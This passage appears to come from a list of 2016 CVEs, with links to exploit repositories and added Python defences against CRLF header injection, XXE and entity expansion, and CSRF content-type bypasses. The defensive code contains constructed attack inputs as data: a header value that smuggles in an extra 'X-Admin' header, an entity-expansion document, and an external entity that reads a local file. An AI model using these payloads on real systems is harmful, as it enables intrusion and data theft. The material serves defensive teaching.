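    return [line.split(b":", 1)[0].decode() for line in head.split(b"\r\n")[1:]]


def build_request_checked(host: str, path: str, headers: dict) -> bytes:
    """Hardened: refuse CR or LF anywhere in the target, header names or values."""
    for field in (host, path, *headers.keys(), *headers.values()):
        if CRLF.search(field):
            raise ValueError(f"CR/LF not allowed in {field!r}")
    return build_request_unchecked(host, path, headers)


def stdlib_rejects_crlf_header() -> bool:
    """Current http.client validates putheader() values. No socket is opened: the
    request is only buffered until endheaders()/getresponse() is called."""
    conn = http.client.HTTPConnection("example.invalid")
    conn.putrequest("GET", "/")
    try:
        conn.putheader("X-Forwarded-For", INJECTED_VALUE)
    except ValueError:
        return True
    return False


# Constructed attacker input: a value already decoded from %0d%0a somewhere upstream.
INJECTED_VALUE = "10.0.0.1\r\nX-Admin: true"

if __name__ == "__main__":
    raw = build_request_unchecked("h", "/", {"X-Forwarded-For": INJECTED_VALUE})
    print(header_names(raw))                 # the server sees an extra X-Admin header
    print(stdlib_rejects_crlf_header())
```

The same rule applies to the request target: a decoded `\r\n` in the path splits the request line just as effectively, which is why the checked builder validates `path` too.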

### CVE-2016-5734 (2016-07-03)

phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 does not properly choose delimiters to prevent use of the preg_replace e (aka eval) modifier, which might allow remote attackers to execute arbitrary PHP code via a crafted string, as demonstrated by the table search-and-replace implementation.

- [KosukeShimofuji/CVE-2016-5734](https://github.com/KosukeShimofuji/CVE-2016-5734)
- [HKirito/phpmyadmin4.4_cve-2016-5734](https://github.com/HKirito/phpmyadmin4.4_cve-2016-5734)
- [miko550/CVE-2016-5734-docker](https://github.com/miko550/CVE-2016-5734-docker)

### CVE-2016-5983 (2016-10-05)

IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.43, 8.0 before 8.0.0.13, 8.5 before 8.5.5.11, 9.0 before 9.0.0.2, and Liberty before 16.0.0.4 allows remote authenticated users to execute arbitrary Java code via a crafted serialized object.

- [BitWrecker/CVE-2016-5983](https://github.com/BitWrecker/CVE-2016-5983)

### CVE-2016-6187 (2016-08-06)

The apparmor_setprocattr function in security/apparmor/lsm.c in the Linux kernel before 4.6.5 does not validate the buffer size, which allows local users to gain privileges by triggering an AppArmor setprocattr hook.

- [vnik5287/cve-2016-6187-poc](https://github.com/vnik5287/cve-2016-6187-poc)
- [Milo-D/CVE-2016-6187_LPE](https://github.com/Milo-D/CVE-2016-6187_LPE)

### CVE-2016-6210 (2017-02-13)

sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.

- [justlce/CVE-2016-6210-Exploit](https://github.com/justlce/CVE-2016-6210-Exploit)
- [goomdan/CVE-2016-6210-exploit](https://github.com/goomdan/CVE-2016-6210-exploit)
- [samh4cks/CVE-2016-6210-OpenSSH-User-Enumeration](https://github.com/samh4cks/CVE-2016-6210-OpenSSH-User-Enumeration)

### CVE-2016-6271 (2017-01-18)

The Bzrtp library (aka libbzrtp) 1.0.x before 1.0.4 allows man-in-the-middle attackers to conduct spoofing attacks by leveraging a missing HVI check on DHPart2 packet reception.

- [gteissier/CVE-2016-6271](https://github.com/gteissier/CVE-2016-6271)

### CVE-2016-6317 (2016-09-07)

Active Record in Ruby on Rails 4.2.x before 4.2.7.1 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request, as demonstrated by certain "[nil]" values, a related issue to CVE-2012-2660, CVE-2012-2694, and CVE-2013-0155.

- [kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317](https://github.com/kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317)

### CVE-2016-6366 (2016-08-18)

Buffer overflow in Cisco Adaptive Security Appliance (ASA) Software through 9.4.2.3 on ASA 5500, ASA 5500-X, ASA Services Module, ASA 1000V, ASAv, Firepower 9300 ASA Security Module, PIX, and FWSM devices allows remote authenticated users to execute arbitrary code via crafted IPv4 SNMP packets, aka Bug ID CSCva92151 or EXTRABACON.

- [RiskSense-Ops/CVE-2016-6366](https://github.com/RiskSense-Ops/CVE-2016-6366)

### CVE-2016-6415 (2016-09-19)

The server IKEv1 implementation in Cisco IOS 12.2 through 12.4 and 15.0 through 15.6, IOS XE through 3.18S, IOS XR 4.3.x and 5.0.x through 5.2.x, and PIX before 7.0 allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request, aka Bug IDs CSCvb29204 and CSCvb36055 or BENIGNCERTAIN.

- [3ndG4me/CVE-2016-6415-BenignCertain-Monitor](https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor)

### CVE-2016-6515 (2016-08-07)

The auth_password function in auth-passwd.c in sshd in OpenSSH before 7.3 does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string.

- [opsxcq/exploit-CVE-2016-6515](https://github.com/opsxcq/exploit-CVE-2016-6515)
- [cved-sources/cve-2016-6515](https://github.com/cved-sources/cve-2016-6515)
- [jptr218/openssh_dos](https://github.com/jptr218/openssh_dos)

### CVE-2016-6516 (2016-08-06)

Race condition in the ioctl_file_dedupe_range function in fs/ioctl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (heap-based buffer overflow) or possibly gain privileges by changing a certain count value, aka a "double fetch" vulnerability.

- [wpengfei/CVE-2016-6516-exploit](https://github.com/wpengfei/CVE-2016-6516-exploit)

### CVE-2016-6584
- [ViralSecurityGroup/KNOXout](https://github.com/ViralSecurityGroup/KNOXout)

### CVE-2016-6662 (2016-09-20)

Oracle MySQL through 5.5.52, 5.6.x through 5.6.33, and 5.7.x through 5.7.15; MariaDB before 5.5.51, 10.0.x before 10.0.27, and 10.1.x before 10.1.17; and Percona Server before 5.5.51-38.1, 5.6.x before 5.6.32-78.0, and 5.7.x before 5.7.14-7 allow local users to create arbitrary configurations and bypass certain protection mechanisms by setting general_log_file to a my.cnf configuration. NOTE: this can be leveraged to execute arbitrary code with root privileges by setting malloc_lib. NOTE: the affected MySQL version information is from Oracle's October 2016 CPU. Oracle has not commented on third-party claims that the issue was silently patched in MySQL 5.5.52, 5.6.33, and 5.7.15.

- [konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch](https://github.com/konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch)
- [meersjo/ansible-mysql-cve-2016-6662](https://github.com/meersjo/ansible-mysql-cve-2016-6662)
- [KosukeShimofuji/CVE-2016-6662](https://github.com/KosukeShimofuji/CVE-2016-6662)
- [Ashrafdev/MySQL-Remote-Root-Code-Execution](https://github.com/Ashrafdev/MySQL-Remote-Root-Code-Execution)
- [boompig/cve-2016-6662](https://github.com/boompig/cve-2016-6662)
- [MAYASEVEN/CVE-2016-6662](https://github.com/MAYASEVEN/CVE-2016-6662)

### CVE-2016-6663 (2016-12-13)

Race condition in Oracle MySQL before 5.5.52, 5.6.x before 5.6.33, 5.7.x before 5.7.15, and 8.x before 8.0.1; MariaDB before 5.5.52, 10.0.x before 10.0.28, and 10.1.x before 10.1.18; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17 allows local users with certain permissions to gain privileges by leveraging use of my_copystat by REPAIR TABLE to repair a MyISAM table.

- [firebroo/CVE-2016-6663](https://github.com/firebroo/CVE-2016-6663)

### CVE-2016-6754 (2016-11-25)

A remote code execution vulnerability in Webview in Android 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-11-05 could enable a remote attacker to execute arbitrary code when the user is navigating to a website. This issue is rated as High due to the possibility of remote code execution in an unprivileged process. Android ID: A-31217937.

- [secmob/BadKernel](https://github.com/secmob/BadKernel)

### CVE-2016-6798 (2017-07-19)

In the XSS Protection API module before 1.0.12 in Apache Sling, the method XSS.getValidXML() uses an insecure SAX parser to validate the input string, which allows for XXE attacks in all scripts which use this method to validate user input, potentially allowing an attacker to read sensitive data on the filesystem, perform same-site-request-forgery (SSRF), port-scanning behind the firewall or DoS the application.

- [tafamace/CVE-2016-6798](https://github.com/tafamace/CVE-2016-6798)
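Both Sling/NetWeaver issues in this section (the UDDI entity-expansion hang in CVE-2016-4014 and the `XSS.getValidXML()` XXE here) need a DOCTYPE in the input, either to declare the entities that expand or to point at an external one. The added example below (my own, not Sling code) refuses the declaration itself, using expat's doctype and entity-declaration callbacks so the check fires before any expansion and is not fooled by `<!DOCTYPE` inside a comment or CDATA section. The sample documents are constructed.

```python
"""Added example: reject any XML that carries a DTD before it reaches the real parser.
Not Apache Sling code; the hostname path in the external-entity sample is illustrative."""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    pass


def reject_dtd(data: bytes) -> None:
    """Raise DTDForbidden at the DOCTYPE or ENTITY declaration, before any expansion.
    Malformed XML raises xml.parsers.expat.ExpatError instead."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} not allowed (system id {sysid!r})")

    def on_entity(*_decl):
        raise DTDForbidden("entity declaration not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Two passes: a cheap DTD gate, then the normal parse of a document known to be DTD-free."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_dtd_free(data: bytes) -> bool:
    try:
        reject_dtd(data)
    except DTDForbidden:
        return False
    return True


# Constructed samples. The expansion document is three levels deep; the real attack
# keeps nesting until the parser exhausts memory or CPU.
SAFE_DOC = b'<?xml version="1.0"?><businessList><name>acme</name></businessList>'
EXPANSION_DOC = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY a "aaaaaaaaaa">'
                 b'<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">'
                 b'<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]><x>&c;</x>')
EXTERNAL_DOC = (b'<?xml version="1.0"?>'
                b'<!DOCTYPE x [<!ENTITY f SYSTEM "file:///etc/hostname">]><x>&f;</x>')
COMMENT_DOC = b'<?xml version="1.0"?><!-- <!DOCTYPE x> --><x/>'

if __name__ == "__main__":
    for label, doc in (("safe", SAFE_DOC), ("expansion", EXPANSION_DOC),
                       ("external", EXTERNAL_DOC), ("comment", COMMENT_DOC)):
        print(label, is_dtd_free(doc))
```

The gate costs one extra pass over legitimate input but aborts malicious input at its first declaration, so the expansion never runs. Where the application genuinely needs a DTD, the alternative is a parser with entity expansion and external resolution disabled; refusing the DTD outright is the simpler property to verify.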

### CVE-2016-6801 (2016-09-21)

Cross-site request forgery (CSRF) vulnerability in the CSRF content-type check in Jackrabbit-Webdav in Apache Jackrabbit 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.3, 2.10.x before 2.10.4, 2.12.x before 2.12.4, and 2.13.x before 2.13.3 allows remote attackers to hijack the authentication of unspecified victims for requests that create a resource via an HTTP POST request with a (1) missing or (2) crafted Content-Type header.

- [TSNGL21/CVE-2016-6801](https://github.com/TSNGL21/CVE-2016-6801)
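The content-type check relies on a browser property: a cross-site POST that carries no Content-Type or one of the three "simple" types can be sent without a CORS preflight, anything else cannot. The two bypasses in the description are therefore (1) leaving the header out, which the check treated as "not a form", and (2) a spelling of a simple type that a string compare did not recognise. The added example below is not Jackrabbit code; it is a request gate written to close both: a missing header counts as simple, the media type is parsed rather than compared, and a simple request must prove an allowed Origin/Referer. The allowed-host set and request dictionaries are constructed.

```python
"""Added example: a CSRF gate of the kind the Jackrabbit advisory describes, written so
that a missing or oddly-spelled Content-Type cannot slip past it. Not Jackrabbit code."""
from email.message import Message
from urllib.parse import urlsplit

# Types a browser sends cross-site without preflight (the CORS "simple" types).
SIMPLE_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE", "MKCOL", "PROPPATCH", "MOVE", "COPY"}


def media_type(content_type):
    """Normalise 'TEXT/Plain; charset=utf-8' -> 'text/plain'; None if the header is absent.
    Message() parses parameters and lower-cases the type; junk falls back to text/plain."""
    if content_type is None:
        return None
    msg = Message()
    msg["Content-Type"] = content_type
    return msg.get_content_type()


def needs_origin_proof(content_type) -> bool:
    """(1) a missing header and (2) any spelling of a simple type both count as simple."""
    mt = media_type(content_type)
    return mt is None or mt in SIMPLE_TYPES


def allow_request(method: str, headers: dict, allowed_hosts) -> bool:
    """True if the request may proceed. `headers` is a plain dict; names are matched
    case-insensitively (assumption: the framework has not already canonicalised them)."""
    if method.upper() not in STATE_CHANGING:
        return True
    h = {k.lower(): v for k, v in headers.items()}
    src = h.get("origin") or h.get("referer")
    if src and urlsplit(src).hostname not in allowed_hosts:
        return False                 # explicit foreign provenance: always refuse
    if not needs_origin_proof(h.get("content-type")):
        return True                  # non-simple type: a browser would have preflighted it
    return bool(src)                 # simple type: must have shown allowed provenance


# Constructed requests covering the two bypasses and the legitimate cases.
ALLOWED = {"example.org"}
CASES = [
    ("GET", {}, True),
    ("POST", {}, False),                                                   # (1) missing header
    ("POST", {"Content-Type": "TEXT/PLAIN; charset=x",
              "Origin": "http://evil.test"}, False),                       # (2) crafted spelling
    ("POST", {"Content-Type": "application/x-www-form-urlencoded",
              "Origin": "https://example.org"}, True),
    ("POST", {"content-type": "multipart/form-data; boundary=abc",
              "referer": "https://example.org/upload"}, True),
    ("POST", {"Content-Type": "application/json"}, True),
    ("POST", {"Content-Type": "application/json", "Origin": "null"}, False),
]

if __name__ == "__main__":
    for method, headers, expected in CASES:
        print(method, headers, allow_request(method, headers, ALLOWED), expected)
```

A gate like this is defence in depth next to a per-request CSRF token; it is what keeps the token check from being bypassed by requests that never reach it.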

### CVE-2016-7117 (2016-10-10)

Use-after-free vulnerability in the __sys_recvmmsg function in net/socket.c in the Linux kernel before 4.5.2 allows remote attackers to execute arbitrary code via vectors involving a recvmmsg system call that is mishandled during error processing.

- [KosukeShimofuji/CVE-2016-7117](https://github.com/KosukeShimofuji/CVE-2016-7117)

### CVE-2016-7190 (2016-10-14)

The Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-3386, CVE-2016-3389, and CVE-2016-7194.

- [0xcl/cve-2016-7190](https://github.com/0xcl/cve-2016-7190)

### CVE-2016-7200 (2016-11-10)

The Chakra JavaScript scripting engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-7201, CVE-2016-7202, CVE-2016-7203, CVE-2016-7208, CVE-2016-7240, CVE-2016-7242, and CVE-2016-7243.

- [theori-io/chakra-2016-11](https://github.com/theori-io/chakra-2016-11)

### CVE-2016-7255 (2016-11-10)

The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."

- [heh3/CVE-2016-7255](https://github.com/heh3/CVE-2016-7255)
- [FSecureLABS/CVE-2016-7255](https://github.com/FSecureLABS/CVE-2016-7255)
- [homjxi0e/CVE-2016-7255](https://github.com/homjxi0e/CVE-2016-7255)
- [yuvatia/page-table-exploitation](https://github.com/yuvatia/page-table-exploitation)
- [bbolmin/cve-2016-7255_x86_x64](https://github.com/bbolmin/cve-2016-7255_x86_x64)

### CVE-2016-7434 (2017-01-13)

The read_mru_list function in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (crash) via a crafted mrulist query.

- [opsxcq/exploit-CVE-2016-7434](https://github.com/opsxcq/exploit-CVE-2016-7434)
- [shekkbuilder/CVE-2016-7434](https://github.com/shekkbuilder/CVE-2016-7434)
- [cved-sources/cve-2016-7434](https://github.com/cved-sources/cve-2016-7434)

### CVE-2016-7608 (2017-02-20)

An issue was discovered in certain Apple products. macOS before 10.12.2 is affected. The issue involves the "IOFireWireFamily" component, which allows local users to obtain sensitive information from kernel memory via unspecified vectors.

- [bazad/IOFireWireFamily-overflow](https://github.com/bazad/IOFireWireFamily-overflow)

### CVE-2016-7855 (2016-11-01)

Use-after-free vulnerability in Adobe Flash Player before 23.0.0.205 on Windows and OS X and before 11.2.202.643 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in October 2016.

- [swagatbora90/CheckFlashPlayerVersion](https://github.com/swagatbora90/CheckFlashPlayerVersion)

### CVE-2016-8007 (2017-03-14)

Authentication bypass vulnerability in McAfee Host Intrusion Prevention Services (HIPS) 8.0 Patch 7 and earlier allows authenticated users to manipulate the product's registry keys via specific conditions.

- [dmaasland/mcafee-hip-CVE-2016-8007](https://github.com/dmaasland/mcafee-hip-CVE-2016-8007)

### CVE-2016-8016 (2017-03-14)

Information exposure in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to obtain the existence of unauthorized files on the system via a URL parameter.

- [opsxcq/exploit-CVE-2016-8016-25](https://github.com/opsxcq/exploit-CVE-2016-8016-25)

### CVE-2016-8367 (2017-02-13)

An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker can open multiple connections to a targeted web server and keep connections open preventing new connections from being made, rendering the web server unavailable during an attack.

- [0xICF/PanelShock](https://github.com/0xICF/PanelShock)

### CVE-2016-8462 (2017-01-12)

An information disclosure vulnerability in the bootloader could enable a local attacker to access data outside of its permission level. This issue is rated as High because it could be used to access sensitive data. Product: Android. Versions: N/A. Android ID: A-32510383.

- [CunningLogic/PixelDump_CVE-2016-8462](https://github.com/CunningLogic/PixelDump_CVE-2016-8462)

### CVE-2016-8467 (2017-01-13)

An elevation of privilege vulnerability in the bootloader could enable a local attacker to execute arbitrary modem commands on the device. This issue is rated as High because it is a local permanent denial of service (device interoperability: completely permanent or requiring re-flashing the entire operating system). Product: Android. Versions: N/A. Android ID: A-30308784.

- [roeeh/bootmodechecker](https://github.com/roeeh/bootmodechecker)

### CVE-2016-8610 (2017-11-13)

A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients.

- [cujanovic/CVE-2016-8610-PoC](https://github.com/cujanovic/CVE-2016-8610-PoC)

### CVE-2016-8636 (2017-02-22)

Integer overflow in the mem_check_range function in drivers/infiniband/sw/rxe/rxe_mr.c in the Linux kernel before 4.9.10 allows local users to cause a denial of service (memory corruption), obtain sensitive information from kernel memory, or possibly have unspecified other impact via a write or read request involving the "RDMA protocol over infiniband" (aka Soft RoCE) technology.

- [jigerjain/Integer-Overflow-test](https://github.com/jigerjain/Integer-Overflow-test)

### CVE-2016-8655 (2016-12-08)

Race condition in net/packet/af_packet.c in the Linux kernel through 4.8.12 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging the CAP_NET_RAW capability to change a socket version, related to the packet_set_ring and packet_setsockopt functions.

- [scarvell/cve-2016-8655](https://github.com/scarvell/cve-2016-8655)
- [LakshmiDesai/CVE-2016-8655](https://github.com/LakshmiDesai/CVE-2016-8655)
- [KosukeShimofuji/CVE-2016-8655](https://github.com/KosukeShimofuji/CVE-2016-8655)
- [agkunkle/chocobo](https://github.com/agkunkle/chocobo)
- [martinmullins/CVE-2016-8655_Android](https://github.com/martinmullins/CVE-2016-8655_Android)

### CVE-2016-8735 (2017-04-06)

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

- [ianxtianxt/CVE-2016-8735](https://github.com/ianxtianxt/CVE-2016-8735)

### CVE-2016-8740 (2016-12-05)

The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.

- [lcfpadilha/mac0352-ep4](https://github.com/lcfpadilha/mac0352-ep4)
- [jptr218/apachedos](https://github.com/jptr218/apachedos)

### CVE-2016-8776 (2017-04-02)

Huawei P9 phones with software EVA-AL10C00,EVA-CL10C00,EVA-DL10C00,EVA-TL10C00 and P9 Lite phones with software VNS-L21C185 allow attackers to bypass the factory reset protection (FRP) to enter some functional modules without authorization and perform operations to update the Google account.

- [akzedevops/CVE-2016-8776](https://github.com/akzedevops/CVE-2016-8776)

### CVE-2016-8823 (2016-12-16)

All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler for DxgDdiEscape where the size of an input buffer is not validated, leading to a denial of service or possible escalation of privileges.

- [SpiralBL0CK/NDAY_CVE_2016_8823](https://github.com/SpiralBL0CK/NDAY_CVE_2016_8823)

### CVE-2016-8858 (2016-12-09)

The kex_input_kexinit function in kex.c in OpenSSH 6.x and 7.x through 7.3 allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate KEXINIT requests. NOTE: a third party reports that "OpenSSH upstream does not consider this as a security issue."

- [dag-erling/kexkill](https://github.com/dag-erling/kexkill)

### CVE-2016-8863 (2017-03-07)

Heap-based buffer overflow in the create_url_list function in gena/gena_device.c in Portable UPnP SDK (aka libupnp) before 1.6.21 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a valid URI followed by an invalid one in the CALLBACK header of a SUBSCRIBE request.

- [mephi42/CVE-2016-8863](https://github.com/mephi42/CVE-2016-8863)

### CVE-2016-8869 (2016-11-04)

The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4 allows remote attackers to gain privileges by leveraging incorrect use of unfiltered data when registering on a site.

- [zugetor/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870](https://github.com/zugetor/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870)
- [rustyJ4ck/JoomlaCVE20168869](https://github.com/rustyJ4ck/JoomlaCVE20168869)
- [cved-sources/cve-2016-8869](https://github.com/cved-sources/cve-2016-8869)

### CVE-2016-8870 (2016-11-04)

The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4, when registration has been disabled, allows remote attackers to create user accounts by leveraging failure to check the Allow User Registration configuration setting.

- [cved-sources/cve-2016-8870](https://github.com/cved-sources/cve-2016-8870)

### CVE-2016-9066 (2018-06-11)

A buffer overflow resulting in a potentially exploitable crash due to memory allocation issues when handling large amounts of incoming data. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.

- [saelo/foxpwn](https://github.com/saelo/foxpwn)

### CVE-2016-9079 (2018-06-11)

A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.

- [LakshmiDesai/CVE-2016-9079](https://github.com/LakshmiDesai/CVE-2016-9079)
- [dangokyo/CVE-2016-9079](https://github.com/dangokyo/CVE-2016-9079)
- [Tau-hub/Firefox-CVE-2016-9079](https://github.com/Tau-hub/Firefox-CVE-2016-9079)

### CVE-2016-9192 (2016-12-14)

A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to install and execute an arbitrary executable file with privileges equivalent to the Microsoft Windows operating system SYSTEM account. More Information: CSCvb68043. Known Affected Releases: 4.3(2039) 4.3(748). Known Fixed Releases: 4.3(4019) 4.4(225).

- [serializingme/cve-2016-9192](https://github.com/serializingme/cve-2016-9192)

### CVE-2016-9244 (2017-02-09)

A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.

- [EgeBalci/Ticketbleed](https://github.com/EgeBalci/Ticketbleed)
- [glestel/minion-ticket-bleed-plugin](https://github.com/glestel/minion-ticket-bleed-plugin)

### CVE-2016-9299 (2017-01-12)

The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.

- [r00t4dm/Jenkins-CVE-2016-9299](https://github.com/r00t4dm/Jenkins-CVE-2016-9299)

### CVE-2016-9795 (2017-01-27)

The casrvc program in CA Common Services, as used in CA Client Automation 12.8, 12.9, and 14.0; CA SystemEDGE 5.8.2 and 5.9; CA Systems Performance for Infrastructure Managers 12.8 and 12.9; CA Universal Job Management Agent 11.2; CA Virtual Assurance for Infrastructure Managers 12.8 and 12.9; CA Workload Automation AE 11, 11.3, 11.3.5, and 11.3.6 on AIX, HP-UX, Linux, and Solaris allows local users to modify arbitrary files and consequently gain root privileges via vectors related to insufficient validation.

- [blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited](https://github.com/blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited)

### CVE-2016-9838 (2016-12-16)

An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the session on a validation error enables a user to gain access to a registered user's account and reset the user's group mappings, username, and password, as demonstrated by submitting a form that targets the `registration.register` task.

- [cved-sources/cve-2016-9838](https://github.com/cved-sources/cve-2016-9838)

### CVE-2016-9920 (2016-12-08)

steps/mail/sendmail.inc in Roundcube before 1.1.7 and 1.2.x before 1.2.3, when no SMTP server is configured and the sendmail program is enabled, does not properly restrict the use of custom envelope-from addresses on the sendmail command line, which allows remote authenticated users to execute arbitrary code via a modified HTTP request that sends a crafted e-mail message.

- [t0kx/exploit-CVE-2016-9920](https://github.com/t0kx/exploit-CVE-2016-9920)

### CVE-2016-10006 (2016-12-24)

In OWASP AntiSamy before 1.5.5, by submitting a specially crafted input (a tag that supports style with active content), you could bypass the library protections and supply executable code. The impact is XSS.

- [epicosy/VUL4J-60](https://github.com/epicosy/VUL4J-60)

### CVE-2016-10033 (2016-12-30)

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.

- [opsxcq/exploit-CVE-2016-10033](https://github.com/opsxcq/exploit-CVE-2016-10033)
- [Zenexer/safeshell](https://github.com/Zenexer/safeshell)
- [GeneralTesler/CVE-2016-10033](https://github.com/GeneralTesler/CVE-2016-10033)
- [chipironcin/CVE-2016-10033](https://github.com/chipironcin/CVE-2016-10033)
- [Bajunan/CVE-2016-10033](https://github.com/Bajunan/CVE-2016-10033)
- [qwertyuiop12138/CVE-2016-10033](https://github.com/qwertyuiop12138/CVE-2016-10033)
- [liusec/WP-CVE-2016-10033](https://github.com/liusec/WP-CVE-2016-10033)
- [pedro823/cve-2016-10033-45](https://github.com/pedro823/cve-2016-10033-45)
- [awidardi/opsxcq-cve-2016-10033](https://github.com/awidardi/opsxcq-cve-2016-10033)
- [0x00-0x00/CVE-2016-10033](https://github.com/0x00-0x00/CVE-2016-10033)
- [cved-sources/cve-2016-10033](https://github.com/cved-sources/cve-2016-10033)
- [j4k0m/CVE-2016-10033](https://github.com/j4k0m/CVE-2016-10033)
- [zeeshanbhattined/exploit-CVE-2016-10033](https://github.com/zeeshanbhattined/exploit-CVE-2016-10033)
- [CAOlvchonger/CVE-2016-10033](https://github.com/CAOlvchonger/CVE-2016-10033)
- [eb613819/CTF_CVE-2016-10033](https://github.com/eb613819/CTF_CVE-2016-10033)
- [ElnurBDa/CVE-2016-10033](https://github.com/ElnurBDa/CVE-2016-10033)
- [Astrowmist/POC-CVE-2016-10033](https://github.com/Astrowmist/POC-CVE-2016-10033)

### CVE-2016-10034 (2016-12-30)

The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.

- [heikipikker/exploit-CVE-2016-10034](https://github.com/heikipikker/exploit-CVE-2016-10034)

### CVE-2016-10140 (2017-01-13)

Information disclosure and authentication bypass vulnerability exists in the Apache HTTP Server configuration bundled with ZoneMinder v1.30 and v1.29, which allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server via the /events URI.

- [asaotomo/CVE-2016-10140-Zoneminder-Poc](https://github.com/asaotomo/CVE-2016-10140-Zoneminder-Poc)

### CVE-2016-10190 (2017-02-09)

Heap-based buffer overflow in libavformat/http.c in FFmpeg before 2.8.10, 3.0.x before 3.0.5, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 allows remote web servers to execute arbitrary code via a negative chunk size in an HTTP response.

